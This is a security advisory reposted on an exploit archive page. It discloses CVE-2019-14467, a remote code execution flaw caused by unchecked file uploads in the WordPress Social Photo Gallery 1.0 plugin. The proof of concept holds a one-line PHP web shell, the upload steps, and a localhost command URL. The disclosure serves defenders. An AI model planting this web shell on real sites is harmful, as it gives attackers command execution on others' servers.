exploit the possibilities

WordPress Social Photo Gallery 1.0 Remote Code Execution

WordPress Social Photo Gallery 1.0 Remote Code Execution
Posted Nov 15, 2019
Authored by Prestigia Seguridad

WordPress Social Gallery plugin version 1.0 suffers from a remote code execution vulnerability.

tags | exploit, remote, code execution
advisories | CVE-2019-14467
MD5 | 1bb9591e3cec19df6dd4e98eaea723af

WordPress Social Photo Gallery 1.0 Remote Code Execution

Change Mirror Download

=============================================
PRESTIGIA SEGURIDAD ALERT 2019-001
- Original release date: July 31, 2019
- Last revised: November 13, 2019
- Discovered by: Prestigia Seguridad
- Severity: 7,5/10 (CVSS Base Score)
- CVE-ID: CVE-2019-14467
=============================================

I. VULNERABILITY
-------------------------
WordPress Plugin Social Photo Gallery 1.0 - Remote Code Execution

II. BACKGROUND
-------------------------
Social Gallery is the ultimate lightbox plugin for WordPress. Your images
deserve to be experienced and shared, to spark a response as they travel
the social web, and to work for you by generating more fans and more Likes
for your content.

III. DESCRIPTION
-------------------------
The version of WordPress Plugin Social Photo Gallery is affected by a
Remote Code Execution vulnerability.

The application does not check the extension when a imagen of a album is
uploaded, resulting in a execution of php code.

To exploit the vulnerability only is needed create a album in the
application and attach a malicious php file in the cover photo album.

IV. PROOF OF CONCEPT
-------------------------

1. Create a .php archive (cmd.php):

<?php system($_GET['cmd']); ?>

2. Click Add Album, select the name, for example "demo" and in the "Cover
Photo" select the cmd.php file.

3. Load the next URL and magic:

http://127.0.0.1/wordpress/wp-content/uploads/socialphotogallery/demo/cmd.php?cmd=ls

V. BUSINESS IMPACT
-------------------------
Execute local commands in the server result from these attacks.

VI. SYSTEMS AFFECTED
-------------------------
WordPress Plugin Social Photo Gallery 1.0

VII. SOLUTION
-------------------------
The solution is only allow upload Digital Image Files: TIFF, JPEG, GIF, PNG

VIII. REFERENCES
-------------------------
https://wordpress.org/plugins/social-photo-gallery/

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by Prestigia Seguridad
Email: info@prestigiaonline.com

X. REVISION HISTORY
-------------------------
July 31, 2019 1: Initial release
November 13, 2019 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-------------------------
July 31, 2019 1: Vulnerability acquired by Prestigia Seguridad
July 31, 2019 2: Email to vendor without response
August 15, 2019 3: Second email to vendor without response
November 13, 2019 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-------------------------
Prestigia Seguridad
https://seguridad.prestigia.es/


Login or Register to add favorites

File Archive:

August 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    3 Files
  • 2
    Aug 2nd
    2 Files
  • 3
    Aug 3rd
    32 Files
  • 4
    Aug 4th
    22 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    19 Files
  • 7
    Aug 7th
    6 Files
  • 8
    Aug 8th
    1 Files
  • 9
    Aug 9th
    2 Files
  • 10
    Aug 10th
    27 Files
  • 11
    Aug 11th
    8 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close